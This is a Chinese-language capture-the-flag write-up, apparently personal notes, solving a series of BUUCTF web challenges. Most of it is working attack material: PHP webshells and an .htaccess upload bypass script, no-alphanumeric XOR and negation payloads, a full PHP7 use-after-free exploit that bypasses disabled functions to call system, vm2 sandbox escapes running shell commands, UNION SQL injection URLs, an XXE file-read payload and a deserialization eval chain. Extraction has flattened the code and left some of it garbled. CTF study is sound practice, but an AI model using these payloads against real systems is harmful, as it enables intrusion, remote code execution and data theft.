1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 <?php function get_the_flag ($userdir = "upload/tmp_" .md5 ($_SERVER ['REMOTE_ADDR' ]);if (!file_exists ($userdir )){mkdir ($userdir );if (!empty ($_FILES ["file" ])){$tmp_name = $_FILES ["file" ]["tmp_name" ];$name = $_FILES ["file" ]["name" ];$extension = substr ($name , strrpos ($name ,"." )+1 );if (preg_match ("/ph/i" ,$extension )) die ("^_^" ); if (mb_strpos (file_get_contents ($tmp_name ), '<?' )!==False) die ("^_^" );if (!exif_imagetype ($tmp_name )) die ("^_^" ); $path = $userdir ."/" .$name ;move_uploaded_file ($tmp_name , $path );print_r ($path );$hhh = @$_GET ['_' ];if (!$hhh ){highlight_file (__FILE__ );if (strlen ($hhh )>18 ){die ('One inch long, one inch strong!' );if ( preg_match ('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i' , $hhh ) )die ('Try something else!' );$character_type = count_chars ($hhh , 3 );if (strlen ($character_type )>12 ) die ("Almost there!" );eval ($hhh );?>
先看下面的利用是一个无字符绕过,由于限制了长度,可以先构造一个$_GET[]()此处[]被过滤可以采用{}来替代也是一样的
1 2 3 4 G % 86 % c1 % 86 % c3 % 86 % d2 % 86 % d9
1 ?_=${%86%86%86%86^%d9%c1%c3%d2} {%86}();&%86=phpinfo
由于count_chars的限制需要尽量保持一致,然后就是用异或的方法构造,可以搜到flag
看上面的内容,过滤了ph和<?比较死,需要传马,考虑到环境是apache服务器,采用.htaccess,
exif_imagetype检测 $tmp_name 所指向的文件是否是一个有效的图片,如何让htaccess被识别为图片有两种方法
文件开头加
1 2 #define width 1337
1 2 3 在.htaccess前添加x00x00x8ax39x8ax39(要在十六进制编辑器中添加,或者使用python的bytes类型)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 import requestsimport base64b""" #define width 1337 #define height 1337 AddType application/x-httpd-php .orange php_value auto_append_file "php://filter/convert.base64-decode/resource=./shell.orange" """ b"GIF89a12" + base64.b64encode(b"<?php eval($_REQUEST['cmd']);?>" )"http://067a6d51-273e-48c0-b717-bbe9c9fdeea8.node5.buuoj.cn:81/?_=${%86%86%86%86^%d9%c1%c3%d2}{%86}();&%86=get_the_flag" 'file' :('.htaccess' ,htaccess,'image/jpeg' )}"upload" :"Submit" }print (response.text)'file' :('shell.orange' ,shell,'image/jpeg' )}print (response.text)
然后蚁剑连接就行了,disable可以用插件绕过
根据hint尝试,后台登录admin::12345
在
1 http://1451649d-20b9-4756-b82d-dba8b58c62cd.node5.buuoj.cn:81/admin.php?m=ui&f=editTemplate
尝试写入马,弹窗
1 请在服务器创建 /var/www/html/system/tmp/rcya.txt 文件,如果存在该文件,使用编辑软件打开,重新保存一遍。
看了看wp,可能真实的渗透就是这样吧,要把思路打开
1 http://1451649d-20b9-4756-b82d-dba8b58c62cd.node5.buuoj.cn:81/admin.php?m=wechat&f=admin
随便尝试注册,然后会发现可以上传二维码
看html可以知道地址,进行伪造
1 2 原始ID /../ ../system/ tmp/rcya.txt/ 0
然后上传一个一句话,再在之前的地方上传一样的马就可以进行rce了。
1 http://1451649d-20b9-4756-b82d-dba8b58c62cd.node5.buuoj.cn:81/admin.php?m=site&f=setsecurity
可以设置密保问题加一个密保问题,再在管理员里面加一个用密保验证
先ctrl+u看源码
1 2 GFXEIM3YFZYGQ4A = 1 nD3x.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 <?php highlight_file (__FILE__ );error_reporting (0 ); $file = "1nD3x.php" ;$shana = $_GET ['shana' ];$passwd = $_GET ['passwd' ];$arg = '' ;$code = '' ;echo "<br /><font color=red><B>This is a very simple challenge and if you solve it I will give you a flag. Good Luck!</B><br></font>" ;if ($_SERVER ) { if (preg_match ('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i' , $_SERVER ['QUERY_STRING' ])die ('You seem to want to do something bad?' ); if (!preg_match ('/http|https/i' , $_GET ['file' ])) {if (preg_match ('/^aqua_is_cute$/' , $_GET ['debu' ]) && $_GET ['debu' ] !== 'aqua_is_cute' ) { $file = $_GET ["file" ]; echo "Neeeeee! Good Job!<br>" ;else die ('fxck you! What do you want to do ?!' );if ($_REQUEST ) { foreach ($_REQUEST as $value ) { if (preg_match ('/[a-zA-Z]/i' , $value )) die ('fxck you! I hate English!' ); if (file_get_contents ($file ) !== 'debu_debu_aqua' )die ("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>" );if ( sha1 ($shana ) === sha1 ($passwd ) && $shana != $passwd ){extract ($_GET ["flag" ]);echo "Very good! you know my password. But what is flag?<br>" ;else {die ("fxck you! you don't know my password! And you don't know sha1! why you come here!" );if (preg_match ('/^[a-z0-9]*$/isD' , $code ) || preg_match ('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i' , $arg ) ) { die ("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w=" ); else { include "flag.php" ;$code ('' , $arg ); ?> and if you solve it I will give you a flag. Good Luck!'t it ?
$_SERVER检查编码不会进行转码
1 ?% 64 ebu=% 61 qua_is_% 63 ute% 0 a
然后下面会检查报错存在
$_REQUEST同时接收GET 和POST 的传参,但POST 拥有更高的优先级,所以只需要POST 相同的参数即可绕过。
传一个debu=1进行绕过
1 ?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a
然后对file进行传值,试了一下base64没有绕过去还是用url绕过
1 2 3 http://ea9b460f-80a6-418e-b500-b8b48f8f4e5e.node5.buuoj.cn:81/1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&file=data://text/plain,%64%65%62%75_%64%65%62%75_%61%71%75%61
进行一个简单的数组绕过,然后再看
这个函数可以将数组的键名作为变量名,键值作为变量值,从而动态生成变量。
1 http://ea9b460f-80a6-418e-b500-b8b48f8f4e5e.node5.buuoj.cn:81/1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&file=data://text/plain,%64%65%62%75_%64%65%62%75_%61%71%75%61&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67[%63%6f%64%65]=create_function&%66%6c%61%67[%61%72%67]=}var_dump(get_defined_vars());//
1 }var_dump (get_defined_vars());
这个是为了提前闭合和结尾,在rea1fl4g.php里
1 php:// filter/convert.base64-encode/ resource=rea1fl4g.php
由于include被禁用使用require,然后再用取反绕过上面的伪协议
最后是
1 2 3 4 5 6 7 8 9 10 11 12 13 POST /1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&file=data://text/plain,%64%65%62%75_%64%65%62%75_%61%71%75%61&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67[%63%6f%64%65]=create_function&%66%6c%61%67[%61%72%67]=}require((~%8 F%97 %8 F%C5%D0%D0%99 %96 %93 %8 B%9 A%8 D%D0%9 C%90 %91 %89 %9 A%8 D%8 B%D1%9 D%9 E%8 C%9 A%C9%CB%D2%9 A%91 %9 C%90 %9 B%9 A%D0%8 D%9 A%8 C%90 %8 A%8 D%9 C%9 A%C2%8 D%9 A%9 E%CE%99 %93 %CB%98 %D1%8 F%97 %8 F));// HTTP/1.1
最后解码得到flag.
www.zip读取源码
随意输入是thinkphp6.0
漏洞点是
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 public function search ( {if (Request ::isPost ()){if (!session ('?UID' ))return redirect ('/home/member/login' ); $data = input ("post." );$record = session ("Record" );if (!session ("Record" ))session ("Record" ,$data ["key" ]);else $recordArr = explode ("," ,$record );$recordLen = sizeof ($recordArr );if ($recordLen >= 3 ){array_shift ($recordArr );session ("Record" ,implode ("," ,$recordArr ) . "," . $data ["key" ]);return View ::fetch ("result" ,["res" => "There's nothing here" ]);
看wp了,没太懂,之后会把thinkphp系统过一遍
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 POST /home/member/register HTTP/1 .1 Host : 91 f09434-610 c-4 ca7-8 a25-63095 e235f33.node5.buuoj.cn:81 Content -Length: 25 Cache -Control: max-age=0 Origin : http://91 f09434-610 c-4 ca7-8 a25-63095 e235f33.node5.buuoj.cn:81 Content -Type: application/x-www-form-urlencodedUpgrade -Insecure-Requests: 1 User -Agent: Mozilla/5 .0 (Windows NT 10 .0 ; Win64; x64) AppleWebKit/537 .36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537 .36 Edg/133.0.0.0 Accept : text/html,application/xhtml+xml,application/xml;q=0 .9 ,image/avif,image/webp,image/apng,*/*;q=0 .8 ,application/signed-exchange;v=b3;q=0 .7 Referer : http://91 f09434-610 c-4 ca7-8 a25-63095 e235f33.node5.buuoj.cn:81 /home/member/registerAccept -Encoding: gzip, deflateAccept -Language: zh-CN,zh;q=0 .9 ,en;q=0 .8 ,en-GB;q=0 .7 ,en-US;q=0 .6 Cookie : PHPSESSID=1234567890123456789012345678 .phpConnection : closeusername =123 &password=123
用这个注册,然后,发个马
马会在
1 /runtime/ session/sess_1234567890123456789012345678.php
蚁剑连接
exploits/php7-backtrace-bypass at master · mm0r1/exploits
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 <?php"/readflag" );function pwn($cmd ) {$abc , $helper , $backtrace ;$a ;function __destruct $backtrace ; unset ($this ->a);$backtrace = (new Exception)->getTrace(); if (!isset($backtrace [1]['args' ])) { $backtrace = debug_backtrace();$a , $b , $c , $d ;function str2ptr(&$str , $p = 0, $s = 8) {$address = 0;for ($j = $s -1; $j >= 0; $j --) {$address <<= 8;$address |= ord($str [$p +$j ]);return $address ;function ptr2str($ptr , $m = 8) {$out = "" ;for ($i =0; $i < $m ; $i ++) {$out .= chr($ptr & 0xff);$ptr >>= 8;return $out ;function write(&$str , $p , $v , $n = 8) {$i = 0;for ($i = 0; $i < $n ; $i ++) {$str [$p + $i ] = chr($v & 0xff);$v >>= 8;function leak($addr , $p = 0, $s = 8) {$abc , $helper ;$abc , 0x68, $addr + $p - 0x10);$leak = strlen($helper ->a);if ($s != 8) { $leak %= 2 << ($s * 8) - 1; }return $leak ;function parse_elf($base ) {$e_type = leak($base , 0x10, 2);$e_phoff = leak($base , 0x20);$e_phentsize = leak($base , 0x36, 2);$e_phnum = leak($base , 0x38, 2);for ($i = 0; $i < $e_phnum ; $i ++) {$header = $base + $e_phoff + $i * $e_phentsize ;$p_type = leak($header , 0, 4);$p_flags = leak($header , 4, 4);$p_vaddr = leak($header , 0x10);$p_memsz = leak($header , 0x28);if ($p_type == 1 && $p_flags == 6) { $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr ;$data_size = $p_memsz ;else if ($p_type == 1 && $p_flags == 5) { $text_size = $p_memsz ;if (!$data_addr || !$text_size || !$data_size )return false ;return [$data_addr , $text_size , $data_size ];function get_basic_funcs($base , $elf ) {$data_addr , $text_size , $data_size ) = $elf ;for ($i = 0; $i < $data_size / 8; $i ++) {$leak = leak($data_addr , $i * 8);if ($leak - $base > 0 && $leak - $base < $data_addr - $base ) {$deref = leak($leak );if ($deref != 0x746e6174736e6f63)continue ;else continue ;$leak = leak($data_addr , ($i + 4) * 8);if ($leak - $base > 0 && $leak - $base < $data_addr - $base ) {$deref = leak($leak );if ($deref != 0x786568326e6962)continue ;else continue ;return $data_addr + $i * 8;function get_binary_base($binary_leak ) {$base = 0;$start = $binary_leak & 0xfffffffffffff000;for ($i = 0; $i < 0x1000; $i ++) {$addr = $start - 0x1000 * $i ;$leak = leak($addr , 0, 7);if ($leak == 0x10102464c457f) { return $addr ;function get_system($basic_funcs ) {$addr = $basic_funcs ;do {$f_entry = leak($addr );$f_name = leak($f_entry , 0, 6);if ($f_name == 0x6d6574737973) { return leak($addr + 8);$addr += 0x20;while ($f_entry != 0);return false ;function trigger_uaf($arg ) {$arg = str_shuffle(str_repeat('A' , 79));$vuln = new Vuln();$vuln ->a = $arg ;if (stristr(PHP_OS, 'WIN' )) {'This PoC is for *nix systems only.' );$n_alloc = 10; $contiguous = [];for ($i = 0; $i < $n_alloc ; $i ++)$contiguous [] = str_shuffle(str_repeat('A' , 79));'x' );$abc = $backtrace [1]['args' ][0];$helper = new Helper;$helper ->b = function ($x ) { };if (strlen($abc ) == 79 || strlen($abc ) == 0) {"UAF failed" );$closure_handlers = str2ptr($abc , 0);$php_heap = str2ptr($abc , 0x58);$abc_addr = $php_heap - 0xc8;$abc , 0x60, 2);$abc , 0x70, 6);$abc , 0x10, $abc_addr + 0x60);$abc , 0x18, 0xa);$closure_obj = str2ptr($abc , 0x20);$binary_leak = leak($closure_handlers , 8);if (!($base = get_binary_base($binary_leak ))) {"Couldn't determine binary base address" );if (!($elf = parse_elf($base ))) {"Couldn't parse ELF header" );if (!($basic_funcs = get_basic_funcs($base , $elf ))) {"Couldn't get basic_functions address" );if (!($zif_system = get_system($basic_funcs ))) {"Couldn't get zif_system address" );$fake_obj_offset = 0xd0;for ($i = 0; $i < 0x110; $i += 8) {$abc , $fake_obj_offset + $i , leak($closure_obj , $i ));$abc , 0x20, $abc_addr + $fake_obj_offset );$abc , 0xd0 + 0x38, 1, 4); $abc , 0xd0 + 0x68, $zif_system ); $helper ->b)($cmd );exit ();
用这个提权,放在这里然后读取flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 import requestsimport timeimport re"http://db8e9a28-3f4d-47dd-a825-937fb9870cd8.node5.buuoj.cn:81/index.php" for i in range (1001 ):r'\d+.[+-].\d+' , res.text)'' .join(ans).replace(" " , "" )eval (ans)"answer" : res1}0.1 )print (res.content)
看一下run.php
1 2 3 4 5 6 7 8 <?php if ( array_key_exists ( "code" , $_GET ) && $_GET [ 'code' ] != NULL ) {$code = $_GET ['code' ];echo eval (code);else {highlight_file (__FILE__ );?>
用这样的发包可以看到回显
1 2 GET /run.php?code=1 % 2B1 ;
用的是js
用Error().stack回显是
1 Error at vm.js: 1 : 1 at Script.runInContext (vm.js: 131 : 20 ) at VM.run (/app/node_modules/vm2/lib/main.js: 219 : 62 ) at /app/server.js: 51 : 33 at Layer.handle [ as handle_request] (/app/node_modules/express/lib/router/layer.js: 95 : 5 ) at next (/app/node_modules/express/lib/router/route.js: 137 : 13 ) at Route.dispatch (/app/node_modules/express/lib/router/route.js: 112 : 3 ) at Layer.handle [ as handle_request] (/app/node_modules/express/lib/router/layer.js: 95 : 5 ) at /app/node_modules/express/lib/router/index.js: 281 : 22 at Function.process_params (/app/node_modules/express/lib/router/index.js: 335 : 12 )
与在 vm2 沙箱中执行的代码有关
Breakout in v3.8.3 · Issue #225 · patriksimek/vm2
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 "use strict" ;{ VM} = require('vm2');{ "return process" )();{ "" )).a = 1 ;} catch(e){ { } ).mainModule.require("child_process" ).execSync("whoami" ).toString();} } +')()';{ } catch(x){ }
1 2 3 4 5 6 7 8 (function(){ "return process" )();{ "" )).a = 1 ;} catch(e){ { } ).mainModule.require("child_process" ).execSync("whoami" ).toString();} } )()
1 js的这个字符串拼接,大致是`${`x`}y`这个形式,会得到内容为xy的字符串,而单独使用`${x}`则是将x作为一个变量引入
1 2 3 4 5 6 7 8 (function (){ [ `${ `${ `prototyp`} e`} `] [ `${ `${ `get_pro`} cess`} `] = f=>f[ `${ `${ `constructo`} r`} `] (`${ `${ `return proc`} ess`} `)();{ 1 ;} catch(e){ [ `${ `${ `get_pro`} cess`} `] (()=>{ } ).mainModule[ `${ `${ `requir`} e`} `] (`${ `${ `child_proces`} s`} `)[ `${ `${ `exe`} cSync`} `] (`ls /`).toString();} } )()
1 2 3 4 5 6 7 8 (function (){ [ `${ `${ `prototyp`} e`} `] [ `${ `${ `get_pro`} cess`} `] = f=>f[ `${ `${ `constructo`} r`} `] (`${ `${ `return proc`} ess`} `)();{ 1 ;} catch(e){ [ `${ `${ `get_pro`} cess`} `] (()=>{ } ).mainModule[ `${ `${ `requir`} e`} `] (`${ `${ `child_proces`} s`} `)[ `${ `${ `exe`} cSync`} `] (`cat /flag`).toString();} } )()
看源码
1 http://e43b88f4-622c-40e8-819a-a197bf504fb7.node5.buuoj.cn:81/index.php?act=upload
1 2 3 4 5 6 7 8 9 if ($contents =file_get_contents ($_FILES ["file" ]["tmp_name" ])){$data =substr ($contents ,5 );foreach ($black_char as $b ) {if (stripos ($data , $b ) !== false ){die ("illegal char" );
一些不包含数字和字母的webshell | 离别歌
测过之后是无字母数字绕过
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 <?php $_ =[];$__ =($_ ==$_ );$_ =~(瞰);$___ =$_ [$__ ];$_ =~(北);$___ .=$_ [$__ ];$_ =~(北);$___ .=$_ [$__ ];$_ =~(的);$___ .=$_ [$__ ];$_ =~(南);$___ .=$_ [$__ ];$_ =~(择);$___ .=$_ [$__ ];$____ =~(~(_));$_ =~(说);$____ .=$_ [$__ ];$_ =~(小);$____ .=$_ [$__ ];$_ =~(笔);$____ .=$_ [$__ ];$_ =~(站);$____ .=$_ [$__ ];$_ =$$____ ;$___ ($_ [_]);
flag在env里
php源码分析 require_once 绕过不能重复包含文件的限制-安全KER - 安全资讯平台
1 ?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
先抓包看看,有sql注入
1 http ://243413 ae-f16e-4452 -86 a4-3 e732d592467.node5.buuoj.cn:81 /query?search=utopia_basin union select version(),database()
1 http://243413ae-f16e-4452-86a4-3e732d592467.node5.buuoj.cn:81/query?search=utopia_basin union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'
没测出东西
1 http://243413ae-f16e-4452-86a4-3e732d592467.node5.buuoj.cn:81/query?search=amazonis_planitia union select 1,group_concat(schema_name) from information_schema.schemata;
1 http://243413 ae-f16e-4452 -86 a4-3e732 d592467.node5.buuoj.cn:81 /query?search =amazonis_planitia union select 1 ,group_concat(table_name ) from information_schema.tables where table_schema="alien_code";
1 http://243413 ae-f16e-4452 -86 a4-3e732 d592467.node5.buuoj.cn:81 /query?search =amazonis_planitia union select 1 ,group_concat(column_name ) from information_schema.columns where table_name ="code";
1 http://243413ae-f16e-4452-86a4-3e732d592467.node5.buuoj.cn:81/query?search=amazonis_planitia union select 1,group_concat(code) from alien_code.code;
1 2 3 4 5 6 7 8 9 10 11 12 13 14 <?php error_reporting (0 );if ($_SERVER ['REQUEST_METHOD' ] !== 'POST' ) {header ("HTTP/1.1 405 Method Not Allowed" );exit ();else {if (!isset ($_POST ['roam1' ]) || !isset ($_POST ['roam2' ])){show_source (__FILE__ );else if ($_POST ['roam1' ] !== $_POST ['roam2' ] && sha1 ($_POST ['roam1' ]) === sha1 ($_POST ['roam2' ])){phpinfo ();
post发包
1 2 3 4 5 6 7 8 9 10 11 12 13 POST /index.php HTTP/1.1
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" > ]><users > <user > <username > gg</username > <password > passwd1</password > <name > ggg</name > <email > alice@fakesite.com</email > <group > CSAW2019</group > <intro > &xxe; </intro > </user > <user > <username > bob</username > <password > passwd2</password > <name > Bob</name > <email > bob@fakesite.com</email > <group > CSAW2019</group > <intro > &xxe; </intro > </user > </users >
1 2 ┌──(orange㉿Coyano)-[/mnt/c/Users/0raN9e/Desktop/一句话木马]cat 1.xml | iconv -f UTF-8 -t UTF-16BE > 2.xml
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 <?php error_reporting (0 );class SYCLOVER public $syc ;public $lover ;public function __wakeup (if ( ($this ->syc != $this ->lover) && (md5 ($this ->syc) === md5 ($this ->lover)) && (sha1 ($this ->syc)=== sha1 ($this ->lover)) ){if (!preg_match ("/\<\?php|\(|\)|\"|\'/" , $this ->syc, $match )){eval ($this ->syc);else {die ("Try Hard !!" );if (isset ($_GET ['great' ])){unserialize ($_GET ['great' ]);else {highlight_file (__FILE__ );?>
类强比较的绕过,主要是要触发__wakeup可以使用error,取反读取/flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 <?php error_reporting (0 ); class SYCLOVER public $syc ;public $lover ;public function __wakeup (if ( ($this ->syc != $this ->lover) && (md5 ($this ->syc) === md5 ($this ->lover)) && (sha1 ($this ->syc)=== sha1 ($this ->lover)) ){if (!preg_match ("/\<\?php|\(|\)|\"|\'/" , $this ->syc, $match )){eval ($this ->syc);else {die ("Try Hard !!" );$str = "?><?=include~" .urldecode ("%D0%99%93%9E%98" )."?>" ;$a =new Error ($str ,1 );$b =new Error ($str ,2 );$c = new SYCLOVER ();$c ->syc = $a ;$c ->lover = $b ;echo (urlencode (serialize ($c )));
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 <?php header ('Content-type:text/html; charset=utf-8' );error_reporting (0 );if (isset ($_POST ['login' ])){$username = $_POST ['username' ];$password = $_POST ['password' ];$Private_key = $_POST ['Private_key' ];if (($username == '' ) || ($password == '' ) ||($Private_key == '' )) {header ('refresh:2; url=login.html' );echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!" ;exit ;else if ($Private_key != '*************' )header ('refresh:2; url=login.html' );echo "假密钥,咋会让你登录?crispr会让你在2秒后跳转到登录界面的!" ;exit ;else {if ($Private_key === '************' ){$getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password '" .';' ; $link =mysql_connect ("localhost" ,"root" ,"root" );mysql_select_db ("test" ,$link );$result = mysql_query ($getuser );while ($row =mysql_fetch_assoc ($result )){echo "<tr><td>" .$row ["username" ]."</td><td>" .$row ["flag" ]."</td><td>" ;function public_key ($length = 16 $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789' ;$public_key = '' ;for ( $i = 0 ; $i < $length ; $i ++ )$public_key .= substr ($strings1 , mt_rand (0 , strlen ($strings1 ) - 1 ), 1 );return $public_key ;function private_key ($length = 12 $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789' ;$private_key = '' ;for ( $i = 0 ; $i < $length ; $i ++ )$private_key .= substr ($strings2 , mt_rand (0 , strlen ($strings2 ) - 1 ), 1 );return $private_key ;$Public_key = public_key ();
